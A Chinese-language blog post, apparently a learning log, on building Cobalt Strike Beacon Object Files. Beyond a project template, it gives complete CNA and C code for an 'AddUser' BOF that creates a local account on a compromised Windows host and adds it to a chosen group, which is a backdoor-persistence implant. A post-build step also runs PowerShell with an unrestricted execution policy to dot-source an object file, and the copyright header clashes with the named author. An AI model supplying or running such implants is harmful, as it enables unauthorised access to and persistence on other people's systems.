BOF探究学习
BOF 学习
Beacon Object File(BOF)是用 C 语言编写的、用于扩展 Beacon 功能的扩展模块。它是编译后未经链接的目标文件(.o/.obj),在运行时由 Beacon 直接加载到自身内存中并执行,无需在目标机器的磁盘上创建任何文件。需要注意:BOF 运行在 Beacon 进程内部,BOF 中的崩溃或未处理异常会导致 Beacon 一起退出。
0x00 准备:
下载 Template
拷贝到 Visual-Studio 目录
%UserProfile%\Documents\Visual Studio 2022\Templates\ProjectTemplates
重启 VS
创建 BOF 项目
批量生成 x64 和 x86 两种架构的目标文件(cna 脚本会按 Beacon 架构选择对应文件),以及编译报错的处理
直接编译会报错,需要把项目的“生成后事件”(Post-Build Event)改为:
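REM Post-build event for the BOF project: copy the x64 object file out of the build output.
REM $(SolutionDir) must carry the leading "$" like $(Configuration) and $(ProjectName) already do,
REM otherwise MSBuild passes the text "(SolutionDir)" through literally and xcopy cannot find the file.
REM NOTE(review): ";" is not a command separator in cmd.exe, and dot-sourcing an .obj in PowerShell is
REM unusual -- confirm what the second half of this line is meant to do before relying on it.
xcopy /y "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }"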
BOF 通用的代码开头(模板)
用字符串来表达
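#include "bofdefs.h"

extern "C" {
/*
 * BOF entry point.
 *
 * buff/len: argument buffer packed by the CNA script (unused by this template).
 *
 * When compiled as a BOF (BOF defined) the Win32 imports are resolved at run
 * time through Dynamic Function Resolution (DFR_LOCAL); when compiled as a
 * normal executable they come from the import table as usual. The only
 * visible effect is a line sent back to the Beacon console via BeaconPrintf.
 */
void go(char* buff, int len) {
#ifdef BOF
    DFR_LOCAL(NETAPI32, DsGetDcNameA);
    DFR_LOCAL(NETAPI32, NetApiBufferFree);
    DFR_LOCAL(KERNEL32, WinExec);
    // add ...
#endif
    BeaconPrintf(CALLBACK_OUTPUT, "The quieter you become, the more you are able to hear");
}
}

#ifndef BOF
/*
 * Test harness for the non-BOF build: call the entry point with no arguments.
 * `int main` replaces the original's non-standard `void main`.
 */
int main(int argc, char* argv[]) {
    go(NULL, 0);
    return 0;
}
#endif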
0x01 落地
写几个程序
添加用户
描述:通过 BOF 在目标主机上创建本地用户,并将其加入指定的本地组(需要管理员权限;账户创建和组成员变更会在目标主机上留下日志记录,属于动静较大的操作)
cna 代码
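# Register the "AddUser" Beacon command: create a local user on the target and
# add it to a local group (the group decides whether the account is privileged).
beacon_command_register(
    "AddUser",
    "add a local user and put it in a local group (needs admin)",
    "Synopsis: AddUser <groupname> <username> <password>");

alias AddUser {
    # Declare every variable local; otherwise $gname/$uname/$pass leak into global scope.
    local('$barch $handle $data $args $gname $uname $pass');
    $gname = $2;
    $uname = $3;
    $pass  = $4;

    # All three arguments are required: the BOF extracts them in this order, and an
    # empty group name would only fail at NetLocalGroupAddMembers, after the account
    # has already been created.
    if ($gname eq "" or $uname eq "" or $pass eq "") {
        berror($1, "usage command: help AddUser");
        return;
    }

    # Pick the object file that matches the Beacon's architecture (x86 / x64).
    $barch = barch($1);
    $handle = openf(script_resource("dist/AddUser-Bof. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);

    # Pack three NUL-terminated wide strings ("Z"); the BOF reads them with BeaconDataExtract.
    $args = bof_pack($1, "ZZZ", $gname, $uname, $pass);
    beacon_inline_execute($1, $data, "go", $args);
}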
BOF 代码
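/**************************************************************************
 * Copyright 2025 Google Inc.
 * File Name: Source.c
 * Description: Cobalt Strike BOF that creates a local user and adds it to a
 *   local group. Reworked from the original at
 *   https://github.com/0x3rhy/AddUser-Bof/blob/main/AddUser-Bof.c ; the group
 *   name was made a parameter so that e.g. the Remote Desktop Users group can
 *   be targeted without recompiling.
 *
 * Version: V1.0
 * Author: 3inter
 * Create Time: 2025-05-28
 **************************************************************************/
#include <windows.h>
#include <stdio.h>
#include <lm.h>
#include "beacon.h"

typedef DWORD NET_API_STATUS;

/* Dynamic Function Resolution: MODULE$Function is resolved by the Beacon loader at run time. */
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);

/*
 * BOF entry point.
 *
 * args/len: buffer packed by the CNA script as bof_pack("ZZZ", group, user,
 *           password); each "Z" is extracted here as a NUL-terminated wide string.
 *
 * Creates a local account (USER_PRIV_USER) on this host and then adds it to the
 * local group named by the first argument. Output goes back through BeaconPrintf
 * and the function returns on the first failure. Note that a failure in the
 * second step leaves the freshly created account behind.
 */
void go(char* args, int len) {
    if (!BeaconIsAdmin()) {
        BeaconPrintf(CALLBACK_ERROR, "[!] You must be admin priv!");
        return;
    }

    datap parser;
    BeaconDataParse(&parser, args, len);
    wchar_t* GroupName = (wchar_t*)BeaconDataExtract(&parser, NULL);
    wchar_t* UserName  = (wchar_t*)BeaconDataExtract(&parser, NULL);
    wchar_t* PassWord  = (wchar_t*)BeaconDataExtract(&parser, NULL);

    /* All three arguments are required; the CNA script packs them in this order. */
    if (GroupName == NULL || UserName == NULL || PassWord == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Invalid argument...\n");
        return;
    }

    /* Zero-initialise so usri1_password_age (not set below) is not garbage. */
    USER_INFO_1 UserInfo = {0};
    UserInfo.usri1_name = UserName;
    UserInfo.usri1_password = PassWord;
    UserInfo.usri1_priv = USER_PRIV_USER;
    UserInfo.usri1_home_dir = NULL;
    UserInfo.usri1_comment = NULL;
    UserInfo.usri1_flags = UF_SCRIPT;       /* UF_SCRIPT must be set for NetUserAdd */
    UserInfo.usri1_script_path = NULL;

    DWORD dwLevel = 1;
    DWORD dwParmErr = 0;   /* index of the offending field when the call returns ERROR_INVALID_PARAMETER */
    NET_API_STATUS dwStatus = NETAPI32$NetUserAdd(NULL, dwLevel, (LPBYTE)&UserInfo, &dwParmErr);
    /* The original wrote `!dwStatus == NERR_Success`, which only worked because NERR_Success is 0. */
    if (dwStatus != NERR_Success) {
        BeaconPrintf(CALLBACK_ERROR, "[!] NetUserAdd failed: %lu (parm_err=%lu)", dwStatus, dwParmErr);
        return;
    }

    LOCALGROUP_MEMBERS_INFO_3 account = {0};
    account.lgrmi3_domainandname = UserInfo.usri1_name;   /* local account, no domain prefix */
    dwStatus = NETAPI32$NetLocalGroupAddMembers(NULL, GroupName, 3, (LPBYTE)&account, 1);
    if (dwStatus != NERR_Success) {
        /* The account already exists at this point; say so, so the operator can clean it up. */
        BeaconPrintf(CALLBACK_ERROR, "[!] User %ls created but NetLocalGroupAddMembers(%ls) failed: %lu",
                     UserName, GroupName, dwStatus);
        return;
    }

    /* NOTE(review): this echoes the cleartext password into the Beacon console and
     * therefore the team server log; the operator already supplied it, consider dropping. */
    BeaconPrintf(CALLBACK_OUTPUT, "[*] username: %ls\n password: %ls\n", UserName, PassWord);
    BeaconPrintf(CALLBACK_OUTPUT, "[*] User %ls has been successfully added", UserName);
}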
待完成….
- ToDoList(实现再更)